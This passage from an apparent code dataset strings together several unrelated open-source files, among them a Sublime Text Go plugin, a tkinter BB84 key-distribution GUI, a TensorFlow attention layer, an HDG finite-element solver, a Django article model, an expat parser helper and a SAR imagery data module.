self._complex_event_proxy.setNext(next_event._complex_event_proxy)
next = property(getNext, setNext)
def getOutputData(self):
complex_event_static_proxy = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.ComplexEventProxy")()
output_data = unwrapData(complex_event_static_proxy.getOutputData(self._complex_event_proxy))
return output_data
def setOutputData(self, datum, index):
#TODO: Improve logic here by adding support to long. Will need to make a java wrapping for handling long
complex_event_static_proxy = SiddhiLoader._loadType(
"org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.ComplexEventProxy")()
complex_event_static_proxy.setOutputData(self._complex_event_proxy,wrapData(datum),index)
def getTimestamp(self):
return self._complex_event_proxy.getTimestamp()
timestamp = property(fget=getTimestamp, fset=None)
def getAttribute(self, position):
return self._complex_event_proxy.getAttribute(position)
def setAttribute(self, value, position):
#TODO: Improve logic here by adding support to long. Will need to make a java wrapping for handling long
self._complex_event_proxy.setAttribute(value,position)
def getType(self):
raw_type_proxy = self._complex_event_proxy.getType()
type_proxy = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")(raw_type_proxy)
return ComplexEvent.Type._map_value(type_proxy)
def setType(self, type):
self._complex_event_proxy.setType(type.value())
type = property(getType, setType)
| apache-2.0 | -1,473,881,451,016,611,300 | 41.550562 | 139 | 0.675469 | false | 3.779441 | false | false | false |
DisposaBoy/GoSublime | gsev.py | 1 | 2415 | from .gosubl import gs
from . import gstest
import sublime
import sublime_plugin
import webbrowser
DOMAIN = 'GsEV'
class EV(sublime_plugin.EventListener):
def on_pre_save(self, view):
view.run_command('gs_fmt')
sublime.set_timeout(lambda: do_set_gohtml_syntax(view), 0)
def on_post_save(self, view):
sublime.set_timeout(lambda: do_post_save(view), 0)
def on_activated(self, view):
win = view.window()
if win is not None:
active_view = win.active_view()
if active_view is not None:
sublime.set_timeout(lambda: do_sync_active_view(active_view), 0)
sublime.set_timeout(lambda: do_set_gohtml_syntax(view), 0)
def on_load(self, view):
sublime.set_timeout(lambda: do_set_gohtml_syntax(view), 0)
class GsOnLeftClick(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
if gs.is_go_source_view(view):
view.run_command('gs9o_open', {
"run": [".actuate", "-button=left"],
"focus_view": False,
"show_view": False,
})
elif view.score_selector(gs.sel(view).begin(), "text.9o") > 0:
view.window().run_command("gs9o_open_selection")
class GsOnRightClick(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
if gs.is_go_source_view(view):
view.run_command('gs9o_open', {
"run": [".actuate", "-button=right"],
"focus_view": False,
"show_view": False,
})
def do_post_save(view):
if not gs.is_pkg_view(view):
return
for c in gs.setting('on_save', []):
cmd = c.get('cmd', '')
args = c.get('args', {})
msg = 'running on_save command %s' % cmd
tid = gs.begin(DOMAIN, msg, set_status=False)
try:
view.run_command(cmd, args)
except Exception as ex:
gs.notice(DOMAIN, 'Error %s' % ex)
finally:
gs.end(tid)
def do_sync_active_view(view):
fn = view.file_name() or ''
gs.set_attr('active_fn', fn)
if fn:
gs.set_attr('last_active_fn', fn)
if fn.lower().endswith('.go'):
gs.set_attr('last_active_go_fn', fn)
win = view.window()
if win is not None and view in win.views():
m = {}
psettings = view.settings().get('GoSublime')
if psettings and gs.is_a(psettings, {}):
m = gs.mirror_settings(psettings)
gs.set_attr('last_active_project_settings', gs.dval(m, {}))
gs.sync_settings()
def do_set_gohtml_syntax(view):
fn = view.file_name()
xl = gs.setting('gohtml_extensions', [])
if xl and fn and fn.lower().endswith(tuple(xl)):
view.set_syntax_file(gs.tm_path('gohtml'))
| mit | -5,356,420,796,553,315,000 | 25.538462 | 68 | 0.657971 | false | 2.616468 | false | false | false |
DQE-Polytech-University/HI | src/console2.py | 1 | 2564 | from tkinter import *
import numpy as np
import math
import Classes as hi
def Insert():
name = text1.get()
Text1.insert(END, name)
    text1.delete(0,END)
def Key_issue():
bases = text1.get()
long_message = text2.get()
bb84 = hi.Various_measurement(int(bases),int(long_message),0)
bb84.begin()
bb84.compare_bob_alice()
bb84.generate_key()
key = bb84.key
Text1.insert(END, key)
#text.delete(0,END)
root = Tk()
root.title('Encrypt me =P')
root.resizable(False, False)
root.geometry('800x550')
text1 = Entry(root, bg = 'white')
text2 = Entry(root, bg = 'white')
Text1 = Listbox(root,height=15,width=35,bd=0)
Text2 = Listbox(root,height=15,width=35,bd=0)
listbox1=Listbox(root,height=6,width=20,selectmode=EXTENDED)
list1=["Hadamard","NOT","Gate_pi","Gate_pi8","Gate_turn","CNOT"]
for i in list1:
listbox1.insert(END,i)
listbox1.pack()
listbox1.place(x=400, y=35)
post_user = Text(root,height=10,width=32,font='Arial 14',wrap=WORD)
Text1.pack()
Text2.pack()
text1.pack()
text2.pack()
post_user.pack()
text1.place(x=230, y=10)
text2.place(x=230, y=40)
Text1.place(x=400, y= 270)
Text2.place(x=550, y= 270)
post_user.place(x=5, y= 270)
#scrollbar['command'] = Text2.xview
#Text2['yscrollcommand'] = scrollbar.set
def delete():
    # Clear every item currently shown in the keys listbox.
    Text1.delete(0,END)
Button1 = Button(root, text="Enter the number of bases:", width=30)
Button2 = Button(root, text="Enter the length of the message:", width=30)
Button3 = Button(root, text="Encrypt message", width=30)
Button4 = Button(root, text="Issue key", width=30, command=Key_issue)
Button5 = Button(root, text="Decrypt message", width=30)
Button6 = Button(root, text="Clear all items", width=30, command=delete)
Button7 = Button(root, text='Exit', width=30, command=root.destroy)
Button9 = Button(root, text="Enter your message:", width=30,bg='green',fg='white')
Button10 = Button(root, text="Our keys:", width=16)
Button11 = Button(root, text="The encrypted message:", width=30)
Button8 = Button(root, text="Select gate:", width=16)
Button1.pack()
Button2.pack()
Button3.pack()
Button4.pack()
Button5.pack()
Button6.pack()
Button7.pack()
Button8.pack()
Button9.pack()
Button10.pack()
Button11.pack()
Button1.place(x=0, y=5)
Button2.place(x=0, y=35)
Button3.place(x=0, y=65)
Button4.place(x=0, y=95)
Button5.place(x=0, y=125)
Button6.place(x=0, y=155)
Button7.place(x=0, y=185)
Button9.place(x=0, y=235)
Button10.place(x=400, y=235)
Button11.place(x=550, y=235)
Button8.place(x=400, y=5)
root.mainloop()
| mit | -945,591,217,603,901,400 | 22.522936 | 82 | 0.688768 | false | 2.579477 | false | false | false |
ashtonteng/squad_exp | AttentionLayer.py | 1 | 3451 | import tensorflow as tf
from tensorflow.contrib import rnn
import numpy as np
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"]="2"
class AttentionLayer():
"""Implements Context-to-Query Attention. Pays attention to different parts of the query when
reading the passage. Returns, for each word in the passage, a weighted vector of questions."""
def __init__(self, args, p_inputs, q_inputs, scope):
"""p_inputs: batch_size x p_length x hidden_size"""
"""q_inputs: batch_size x q_length x hidden_size"""
print("building attention layer", scope)
batch_size = args.batch_size
vocab_size = args.vocab_size
hidden_size = args.AttentionLayer_size
model = args.model
num_layers = args.num_layers
training = args.training
with tf.name_scope(scope):
p_inputs_shape = tf.shape(p_inputs)
q_inputs_shape = tf.shape(q_inputs)
p_length = p_inputs_shape[1]
q_length = q_inputs_shape[1]
p_inputs_aug = tf.tile(tf.expand_dims(p_inputs, 2), [1, 1, q_length, 1]) #batch_size x p_length x q_length x hidden_size
q_inputs_aug = tf.tile(tf.expand_dims(q_inputs, 1), [1, p_length, 1, 1]) #batch_size x p_length x q_length x hidden_size
pq_elementwise = tf.multiply(p_inputs_aug, q_inputs_aug) #batch_size x p_length x q_length x hidden_size
combo_input = tf.concat([p_inputs_aug, q_inputs_aug, pq_elementwise], axis=3) #batch_size x p_length x q_length x 3*hidden_size
with tf.variable_scope(scope):
w_sim = tf.get_variable("w_sim", [3*hidden_size, 1])
#in order to matmul combo_input with w_sim, we need to first tile w_sim batch_size number of times, and flatten combo_input
combo_input_flat = tf.reshape(combo_input, [batch_size, -1, 3*hidden_size]) #batch_size x p_length*q_length x 3*hidden_size
w_sim_tiled = tf.tile(tf.expand_dims(w_sim, 0), [batch_size, 1, 1]) #batch_size x 3*hidden_size x 1
sim_mtx_flat = tf.matmul(combo_input_flat, w_sim_tiled) #batch_size x p_length*q_length x 1
sim_mtx = tf.reshape(sim_mtx_flat, [batch_size, p_length, q_length, 1]) #batch_size x p_length x q_length x 1
#C2Q attention: how relevant are the query words to each context word?
#a #for each p, find weights to put on q. ##batch_size x p_length x q_length x hidden_size
att_on_q = tf.nn.softmax(sim_mtx, dim=2)
#q_inputs_aug = batch_size x p_length x q_length x hidden_size
weighted_q = tf.multiply(att_on_q, q_inputs_aug)
linear_combo_q_for_each_p = tf.reduce_sum(weighted_q, axis=2) #batch_size x p_length x hidden_size
#Q2C Attention: which context words have the closest similarity to one of the query words?
#for each context word choose which query word it helps contribute to the most
#then normalize over all context words, to get a distribution of helpfulness of all context words to this query
att_on_p = tf.nn.softmax(tf.reduce_max(sim_mtx, axis=2), dim=1) #batch_size x p_length x 1
weighted_p = tf.multiply(att_on_p, p_inputs) #batch_size x p_length x hidden_size
self.outputs = tf.concat([p_inputs, linear_combo_q_for_each_p, tf.multiply(p_inputs, linear_combo_q_for_each_p), tf.multiply(p_inputs, weighted_p)], axis=2)
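            # Editor's note (added, not in the original source): the block above
            # follows the BiDAF-style attention flow; per batch element,
            #   sim(i, j) = w_sim . [p_i ; q_j ; p_i * q_j]
            #   c2q_i     = sum_j softmax_j(sim(i, :)) * q_j          (context-to-query)
            #   q2c       = softmax_i(max_j sim(i, j)) * p            (query-to-context)
            #   outputs_i = [p_i ; c2q_i ; p_i * c2q_i ; p_i * q2c_i]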
| mit | -5,947,735,938,825,889,000 | 55.57377 | 168 | 0.637496 | false | 3.2898 | false | false | false |
asdf123101/HDPG1D | hdpg1d/adaptation.py | 1 | 8070 | import numpy as np
from numpy import concatenate as cat
from scipy.sparse import csr_matrix
import scipy.sparse.linalg as spla
from copy import copy
import matplotlib.pyplot as plt
import warnings
from .preprocess import shape, discretization, boundaryCondition
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
# supress the deprecation warning
warnings.filterwarnings("ignore", ".*GUI is implemented.*")
class hdpg1d(object):
"""
1D HDG solver
"""
def __init__(self, coeff):
self.numEle = coeff.numEle
self.numBasisFuncs = coeff.pOrder + 1
self.coeff = coeff
self.mesh = np.linspace(0, 1, self.numEle + 1)
self.enrichOrder = 1
self.primalSoln = None
self.adjointSoln = None
self.estErrorList = [[], []]
self.trueErrorList = [[], []]
def separateSoln(self, soln):
"""Separate gradState (q and u), stateFace from the given soln"""
gradState, stateFace = np.split(
soln, [len(soln) - self.numEle + 1])
return gradState, stateFace
def plotState(self, counter):
"""Plot solution u with smooth higher oredr quadrature"""
stateSmooth = np.array([])
stateNode = np.zeros(self.numEle + 1)
xSmooth = np.array([])
gradState, _ = self.separateSoln(self.primalSoln)
halfLenState = int(len(gradState) / 2)
state = gradState[halfLenState:2 * halfLenState]
# quadrature rule
gorder = 10 * self.numBasisFuncs
xi, wi = np.polynomial.legendre.leggauss(gorder)
shp, shpx = shape(xi, self.numBasisFuncs)
for j in range(1, self.numEle + 1):
xSmooth = np.hstack((xSmooth, (self.mesh[(j - 1)] + self.mesh[j]) / 2 + (
self.mesh[j] - self.mesh[j - 1]) / 2 * xi))
stateSmooth = np.hstack(
(stateSmooth, shp.T.dot(state[(j - 1) * self.numBasisFuncs:j * self.numBasisFuncs])))
stateNode[j - 1] = state[(j - 1) * self.numBasisFuncs]
stateNode[-1] = state[-1]
plt.figure(1)
plt.plot(xSmooth, stateSmooth, '-', color='C3')
plt.plot(self.mesh, stateNode, 'C3.')
plt.xlabel('$x$', fontsize=17)
plt.ylabel('$u$', fontsize=17)
# plt.axis([-0.05, 1.05, 0, 1.3])
plt.grid()
plt.pause(5e-1)
def meshAdapt(self, index):
"""Given the index list, adapt the mesh"""
inValue = np.zeros(len(index))
for i in np.arange(len(index)):
inValue[i] = (self.mesh[index[i]] +
self.mesh[index[i] - 1]) / 2
self.mesh = np.sort(np.insert(self.mesh, 0, inValue))
def solvePrimal(self):
"""Solve the primal problem"""
if 'matLocal' in locals():
# if matLocal exists,
# only change the mesh instead of initializing again
matLocal.mesh = self.mesh
else:
matLocal = discretization(self.coeff, self.mesh)
matGroup = matLocal.matGroup()
A, B, _, C, D, E, F, G, H, L, R = matGroup
# solve by exploiting the local global separation
K = -cat((C.T, G), axis=1)\
.dot(np.linalg.inv(np.bmat([[A, -B], [B.T, D]]))
.dot(cat((C, E)))) + H
sK = csr_matrix(K)
F_hat = np.array([L]).T - cat((C.T, G), axis=1)\
.dot(np.linalg.inv(np.bmat([[A, -B], [B.T, D]])))\
.dot(np.array([cat((R, F))]).T)
def invRHS(vec):
"""Construct preconditioner"""
matVec = spla.spsolve(sK, vec)
return matVec
n = len(F_hat)
preconditioner = spla.LinearOperator((n, n), invRHS)
stateFace = spla.gmres(sK, F_hat, M=preconditioner)[0]
# stateFace = np.linalg.solve(K, F_hat)
gradState = np.linalg.inv(np.asarray(np.bmat([[A, -B], [B.T, D]]))).dot(
cat((R, F)) - cat((C, E)).dot(stateFace))
self.primalSoln = cat((gradState, stateFace))
def solveAdjoint(self):
"""Solve the adjoint problem"""
# solve in the enriched space
_coeff = copy(self.coeff)
_coeff.pOrder = _coeff.pOrder + 1
if 'matAdjoint' in locals():
matAdjoint.mesh = self.mesh
else:
matAdjoint = discretization(_coeff, self.mesh)
matGroup = matAdjoint.matGroup()
A, B, _, C, D, E, F, G, H, L, R = matGroup
# add adjoint LHS conditions
F = np.zeros(len(F))
R[-1] = -boundaryCondition('adjoint')[1]
# assemble global matrix LHS
LHS = np.bmat([[A, -B, C],
[B.T, D, E],
[C.T, G, H]])
sLHS = csr_matrix(LHS)
RHS = cat((R, F, L))
# solve in one shoot using GMRES
def invRHS(vec):
"""Construct preconditioner"""
matVec = spla.spsolve(sLHS, vec)
return matVec
n = len(RHS)
preconditioner = spla.LinearOperator((n, n), invRHS)
soln = spla.gmres(sLHS, RHS, M=preconditioner)[0]
# soln = np.linalg.solve(LHS.T, RHS)
self.adjointSoln = soln
def DWResidual(self):
if 'matResidual' in locals():
matResidual.mesh = self.mesh
else:
matResidual = discretization(
self.coeff, self.mesh, self.enrichOrder)
matGroup = matResidual.matGroup()
A, B, BonQ, C, D, E, F, G, H, L, R = matGroup
LHS = np.bmat([[A, -B, C],
[BonQ, D, E]])
RHS = cat((R, F))
residual = np.zeros(self.numEle)
numEnrich = self.numBasisFuncs + self.enrichOrder
adjointGradState, adjointStateFace = self.separateSoln(
self.adjointSoln)
for i in np.arange(self.numEle):
primalResidual = (LHS.dot(self.primalSoln) - RHS).A1
uLength = self.numEle * numEnrich
stepLength = i * numEnrich
uDWR = primalResidual[stepLength:stepLength + numEnrich].dot(
(1 - adjointGradState)[stepLength:stepLength + numEnrich])
qDWR = primalResidual[uLength + stepLength:uLength +
stepLength + numEnrich]\
.dot((1 - adjointGradState)[uLength + stepLength:uLength +
stepLength + numEnrich])
residual[i] = uDWR + qDWR
# sort residual index
residualIndex = np.argsort(np.abs(residual))
# select top \theta% elements with the largest error
theta = 0.15
refineIndex = residualIndex[
int(self.numEle * (1 - theta)):len(residual)] + 1
return np.abs(np.sum(residual)), refineIndex
def adaptive(self):
TOL = self.coeff.TOL
estError = 10
nodeCount = 0
maxCount = self.coeff.MAXIT
while estError > TOL and nodeCount < maxCount:
# solve
self.solvePrimal()
self.solveAdjoint()
# plot the solution at certain counter
if nodeCount in [0, 4, 9, 19, maxCount]:
plt.clf()
self.plotState(nodeCount)
# record error
self.trueErrorList[0].append(self.numEle)
self.trueErrorList[1].append(
self.primalSoln[self.numEle * self.numBasisFuncs - 1])
estError, index = self.DWResidual()
self.estErrorList[0].append(self.numEle)
self.estErrorList[1].append(estError)
# adapt
index = index.tolist()
self.meshAdapt(index)
self.numEle = self.numEle + len(index)
nodeCount += 1
print("Iteration {}. Estimated target function error {:.3e}."
.format(nodeCount, estError))
if nodeCount == maxCount:
print("Max iteration number is reached "
"while the convergence criterion is not satisfied.\n"
"Check the problem statement or "
"raise the max iteration number, then try again.\n")
| mit | 3,414,982,141,776,126,000 | 38.950495 | 101 | 0.547212 | false | 3.444302 | false | false | false |
IntSPstudio/vslst-python | sta/980004006.py | 1 | 1674 | #|==============================================================|#
# Made by IntSPstudio
# Project Visual Street
# ID: 980004006
# Twitter: @IntSPstudio
#|==============================================================|#
#SYSTEM
import os
import sys
#import time
import turtle
import math
#ALG
#Circumference of a circle
def calcCircleRl(rlRadius):
#2PIR
output = 2*pi*rlRadius
return output
#Calculates the arc length of a circle slice
def calcCircleSliceRl(rlAngle,rlRadius):
output = rlAngle/360*pi*rlRadius*2
return output
#CONTENT SCREEN
contentscreen = turtle.Screen()
contentscreen.bgcolor("black")
#TURTLE
julle = turtle.Turtle()
julle.color("white")
julle.speed(5)
#INPUT
scriptFle = sys.argv[0]
scriptCircleRadius = sys.argv[1]
scriptCircleSliceAngle = sys.argv[2]
#BASIC VRB
#systemContinuity =1
pi = math.pi
inputCircleRadius = int(scriptCircleRadius)
inputCircleSliceAngle = int(scriptCircleSliceAngle)
inputCircleRl = calcCircleRl(inputCircleRadius)
inputCircleSliceRl = calcCircleSliceRl(inputCircleSliceAngle,inputCircleRadius)
#CLEAR SCREEN
os.system("cls")
#PRINT DATA
print(" Radius:", inputCircleRadius)
print(" Slice:", scriptCircleSliceAngle)
print("Circle Rl:", inputCircleRl)
print(" Slice Rl:", inputCircleSliceRl)
print(" %Rld:", inputCircleSliceRl / inputCircleRl *100)
#ACTION
#Start position
julle.penup()
julle.forward(inputCircleRadius)
julle.left(90)
julle.pendown()
#Circle
julle.circle(inputCircleRadius)
#Slice
julle.pendown()
julle.left(90)
julle.forward(inputCircleRadius)
julle.right(180 - inputCircleSliceAngle)
julle.forward(inputCircleRadius)
julle.right(180)
julle.forward(inputCircleRadius)
#Wait
contentscreen.mainloop()
os.system("cls") | mit | -8,946,986,960,882,005,000 | 23.231884 | 79 | 0.72711 | false | 2.957522 | false | false | false |
progdupeupl/pdp_website | pdp/article/models.py | 1 | 7425 | # coding: utf-8
#
# This file is part of Progdupeupl.
#
# Progdupeupl is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Progdupeupl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Progdupeupl. If not, see <http://www.gnu.org/licenses/>.
"""Models for article app."""
import os
import string
from django.db import models
# from django.db.models.signals import post_save
from django.conf import settings
# from django.dispatch import receiver
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from taggit.managers import TaggableManager
from pdp.utils import slugify
from pdp.utils.models import has_changed
from pdp.tutorial.models import Tutorial
from PIL import Image
from io import BytesIO
from django.core.files.uploadedfile import SimpleUploadedFile
IMAGE_MAX_WIDTH = 64
IMAGE_MAX_HEIGHT = 64
def image_path(instance, filename):
"""Return path to an article image.
Returns:
string
"""
ext = filename.split('.')[-1]
    filename = u'original.{}'.format(ext.lower())
return os.path.join('articles', str(instance.pk), filename)
def thumbnail_path(instance, filename):
"""Return path to an article thumbnail.
Returns:
string
"""
ext = filename.split('.')[-1]
    filename = u'thumb.{}'.format(ext.lower())
return os.path.join('articles', str(instance.pk), filename)
class ArticleCategory(models.Model):
"""A way to organize article in different category."""
class Meta:
verbose_name = u'Catégorie d’article'
verbose_name_plural = u'Catégories d’article'
title = models.CharField(u'Titre', max_length=80)
slug = models.SlugField(max_length=80)
def __str__(self):
"""Textual representation of a category.
Returns:
string
"""
return self.title
def get_absolute_url(self):
"""Get URL to view the category.
Returns:
string
"""
return reverse('pdp.article.views.by_category', args=(
self.slug,
))
def get_article_count(self):
"""Return number of articles in this category."""
return Article.objects \
.filter(is_visible=True) \
.filter(category__pk=self.pk).count()
class Article(models.Model):
"""An article."""
class Meta:
verbose_name = u'Article'
verbose_name_plural = u'Articles'
title = models.CharField(u'Titre', max_length=80)
description = models.CharField(u'Description', max_length=200)
text = models.TextField(u'Texte', blank=True)
author = models.ForeignKey(User, verbose_name=u'Auteur',
related_name='articles')
slug = models.SlugField(max_length=80)
pubdate = models.DateTimeField(u'Date de publication', blank=True)
tags = TaggableManager()
image = models.ImageField(upload_to=image_path,
blank=True, null=True, default=None)
thumbnail = models.ImageField(upload_to=thumbnail_path,
blank=True, null=True, default=None)
is_visible = models.BooleanField(u'Est visible publiquement',
default=False)
is_pending = models.BooleanField(u'Est en attente', default=False)
is_beta = models.BooleanField(u'Est visible par les membres',
default=False)
category = models.ForeignKey(ArticleCategory, null=True, blank=True,
verbose_name=u'Catégorie')
to_tutorial = models.ForeignKey(Tutorial,
verbose_name=u'Tutoriel correspondant',
null=True, blank=True)
def __str__(self):
"""Textual representation of an article.
Returns:
string
"""
return self.title
def get_absolute_url(self):
"""Get URL to view the article.
Returns:
string
"""
return reverse('pdp.article.views.redirect_view', args=(
self.pk, self.slug,
))
def get_pdf_url(self):
"""Get URL to get a PDF file of this article."""
return u'{}/articles/{}/{}.pdf'.format(
settings.MEDIA_URL,
self.pk,
self.slug,
)
def get_edit_url(self):
"""Get URL to edit the article.
Returns:
string
"""
return '/articles/editer?article={0}'.format(self.pk)
def get_download_url(self):
return u'{}?article={}'.format(
reverse('pdp.article.views.download'),
self.pk)
def save(self, force_update=False, force_insert=False,
thumb_size=(IMAGE_MAX_HEIGHT, IMAGE_MAX_WIDTH)):
"""Save the article.
This will save thumbnail on disk and then save the model in database.
"""
self.slug = slugify(self.title)
if has_changed(self, 'image') and self.image:
# TODO : delete old image
image = Image.open(self.image)
if image.mode not in ('L', 'RGB'):
image = image.convert('RGB')
image.thumbnail(thumb_size, Image.ANTIALIAS)
# save the thumbnail to memory
            temp_handle = BytesIO()
image.save(temp_handle, 'png')
temp_handle.seek(0) # rewind the file
# save to the thumbnail field
suf = SimpleUploadedFile(os.path.split(self.image.name)[-1],
temp_handle.read(),
content_type='image/png')
self.thumbnail.save('{}.png'.format(suf.name), suf, save=False)
# save the image object
super().save(force_update, force_insert)
else:
super().save()
def get_last_articles():
"""Get the last published articles.
This should be used for the home page article displaying.
Returns:
list of Article
"""
return Article.objects.all()\
.filter(is_visible=True)\
.order_by('-pubdate')[:5]
def get_prev_article(g_article):
"""Try to get the previous article ordered by pubdate.
If g_article is the first article ever, None will be returned.
Returns:
Article
"""
try:
return Article.objects\
.filter(is_visible=True)\
.filter(pubdate__lt=g_article.pubdate)\
.order_by('-pubdate')[0]
except IndexError:
return None
def get_next_article(g_article):
"""Try to get the next article ordered by pubdate.
If g_article is the last one, None will be returned.
Returns:
Article
"""
try:
return Article.objects\
.filter(is_visible=True)\
.filter(pubdate__gt=g_article.pubdate)\
.order_by('pubdate')[0]
except IndexError:
return None
| agpl-3.0 | -5,753,180,119,510,398,000 | 26.072993 | 77 | 0.600566 | false | 4.111973 | false | false | false |
mdsitton/pyogl | pglgen/xmlparse.py | 1 | 3930 | from xml.parsers import expat
class TagStack(object):
def __init__(self):
self.tags = []
self.args = []
self.data = []
self.dataAdded = []
self.stackSize = 0
self.frameHasData = False
def push(self, tag, args):
self.tags.append(tag)
self.args.append(args)
self.data.append([])
self.dataAdded.append(False)
self.stackSize += 1
def add_data(self, data):
self.data[self.stackSize-1].append(data)
self.dataAdded[-1] = True
def clear_frame_data(self):
self.data[self.stackSize-1] = []
self.dataAdded[-1] = False
def is_data_added(self, posRel=0):
pos = -1 - posRel
return self.dataAdded[pos]
def pop(self):
self.dataAdded.pop()
stackFrame = (self.tags.pop(), self.args.pop(), self.data.pop())
self.stackSize -= 1
return stackFrame
def peek(self, posRel=0):
pos = -1 - posRel
return (self.tags[pos], self.args[pos], self.data[pos])
def path(self):
return '/'.join(self.tags)
class BaseParser(object):
def __init__(self, xmlParser, tag, parent, root):
# This is a hacky workaround to be able to pass in a data string
# to be accessed by any sub-parsers.
if isinstance(parent, str) or isinstance(parent, bytes):
self.strdata = parent
parent = None
else:
self.strdata = parent.strdata
self.xmlParser = xmlParser
self.parent = parent
self.tag = tag
self.root = root
if self.parent is None and self.tag is None and self.root is None:
self.isRoot = True
else:
self.isRoot = False
if self.isRoot:
self.stack = TagStack()
self.root = self
else:
self.stack = self.root.stack
self.parsers = {}
self.set_handlers()
self.init_data(self.strdata)
def set_handlers(self):
self.xmlParser.StartElementHandler = self.start
self.xmlParser.CharacterDataHandler = self.data
self.xmlParser.EndElementHandler = self.end
def restore_handlers(self):
if self.parent is not None:
self.parent.set_handlers()
def start(self, tag, attrs):
self.stack.push(tag, attrs)
tagPath = self.stack.path()
for parser in self.parsers:
if parser == tagPath:
ParserClass = self.parsers[parser]['object']
parInst = self.switch_parser(ParserClass)
self.parsers[parser]['instance'] = parInst
def data(self, data):
# We need to check if the stack frame has been used
# previously and clear the previous data if so.
if self.stack.is_data_added() is True:
self.stack.clear_frame_data()
self.stack.add_data(data.strip())
self.parse()
def end(self, tag):
if self.stack.is_data_added() is False:
self.parse()
if tag == self.tag:
self.integrate()
self.restore_handlers()
self.stack.pop()
def switch_parser(self, parser):
tag, attrs, data = self.stack.peek()
return parser(self.xmlParser, tag, self, self.root)
def register_parser(self, stackTree, parser):
self.parsers[stackTree] = {'object': parser}
# The following method stubs are what the parsing sub-classes
# will be implemented within.
def init_data(self, strData):
pass
def parse(self):
pass
def integrate(self):
pass
def parse_xml(rootParser, xmlPath, strdata):
xmlParser = expat.ParserCreate()
root = rootParser(xmlParser, None, strdata, None)
with open(xmlPath, 'rb') as xmlFile:
for line in xmlFile:
xmlParser.Parse(line.strip(), 0)
xmlParser.Parse(b'', 1)
return root
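# Usage sketch added by the editor; it is not part of the original module and
# the tag paths ('catalog', 'catalog/item') and class names are hypothetical.
# A root parser registers sub-parsers keyed by the slash-joined tag path that
# TagStack.path() produces; parse_xml() then drives expat through them:
#
#   class ItemParser(BaseParser):
#       def init_data(self, strdata):
#           self.text = ''
#
#       def parse(self):
#           tag, attrs, data = self.stack.peek()
#           self.text = ''.join(data)
#
#       def integrate(self):
#           self.parent.items.append(self.text)
#
#   class CatalogParser(BaseParser):
#       def init_data(self, strdata):
#           self.items = []
#           self.register_parser('catalog/item', ItemParser)
#
#   root = parse_xml(CatalogParser, 'catalog.xml', '')
#   print(root.items)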
| bsd-2-clause | 870,257,657,208,985,100 | 25.554054 | 74 | 0.577354 | false | 3.845401 | false | false | false |
Applied-GeoSolutions/gips | gips/data/sarannual/sarannual.py | 1 | 6502 | #!/usr/bin/env python
################################################################################
# GIPS: Geospatial Image Processing System
#
# AUTHOR: Matthew Hanson
# EMAIL: [email protected]
#
# Copyright (C) 2014-2018 Applied Geosolutions
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
################################################################################
import os
import datetime
import gippy
from gips.data.core import Repository, Asset, Data
from gips.utils import RemoveFiles, VerboseOut
from gips import utils
class sarannualRepository(Repository):
name = 'SARAnnual'
description = 'Synthetic Aperture Radar PALSAR Mosaics'
_datedir = '%Y'
@classmethod
def feature2tile(cls, feature):
""" Get tile designation from a geospatial feature (i.e. a row) """
fldindex_lat = feature.GetFieldIndex("lat")
fldindex_lon = feature.GetFieldIndex("lon")
lat = int(feature.GetField(fldindex_lat) + 0.5)
lon = int(feature.GetField(fldindex_lon) - 0.5)
if lat < 0:
lat_h = 'S'
else:
lat_h = 'N'
if lon < 0:
lon_h = 'W'
else:
lon_h = 'E'
tile = lat_h + str(abs(lat)).zfill(2) + lon_h + str(abs(lon)).zfill(3)
return tile
class sarannualAsset(Asset):
Repository = sarannualRepository
_sensors = {
#'AFBS': 'PALSAR FineBeam Single Polarization',
'PALSAR': {'description': 'PALSAR Mosaic (FineBeam Dual Polarization)'},
#'AWB1': 'PALSAR WideBeam (ScanSAR Short Mode)',
#'JFBS': 'JERS-1 FineBeam Single Polarization'
}
_assets = {
'MOS': {
'startdate': datetime.date(1, 1, 1),
'latency': 0,
'pattern': r'^.{7}_.{2}_MOS\.tar\.gz$'
},
'FNF': {
'startdate': datetime.date(1, 1, 1),
'latency': 0,
'pattern': r'^.{7}_.{2}_FNF\.tar\.gz$'
},
}
_defaultresolution = [0.00044444444, 0.00044444444]
def __init__(self, filename):
""" Inspect a single file and get some basic info """
super(sarannualAsset, self).__init__(filename)
bname = os.path.basename(filename)
self.asset = bname[11:14]
self.tile = bname[0:7]
self.sensor = 'PALSAR'
self.date = datetime.datetime.strptime(bname[8:10], '%y')
self.rootname = bname[0:10]
def extract(self, filenames=[]):
""" Extract filesnames from asset """
files = super(sarannualAsset, self).extract(filenames)
datafiles = {}
for f in files:
bname = os.path.basename(f)
if f[-3:] != 'hdr':
bandname = bname[len(self.rootname) + 1:]
datafiles[bandname] = f
return datafiles
class sarannualData(Data):
""" Tile of data """
name = 'SARAnnual'
version = '0.9.0'
Asset = sarannualAsset
_pattern = '*'
_products = {
'sign': {
'description': 'Sigma nought (radar backscatter coefficient)',
'assets': ['MOS'],
},
'fnf': {
'description': 'Forest/NonForest Mask',
'assets': ['FNF'],
}
}
def meta(self, tile):
""" Get metadata for this tile """
return {'CF': -83.0}
def find_files(self):
""" Search path for valid files """
filenames = super(sarannualData, self).find_files()
filenames[:] = [f for f in filenames if os.path.splitext(f)[1] != '.hdr']
return filenames
def process(self, *args, **kwargs):
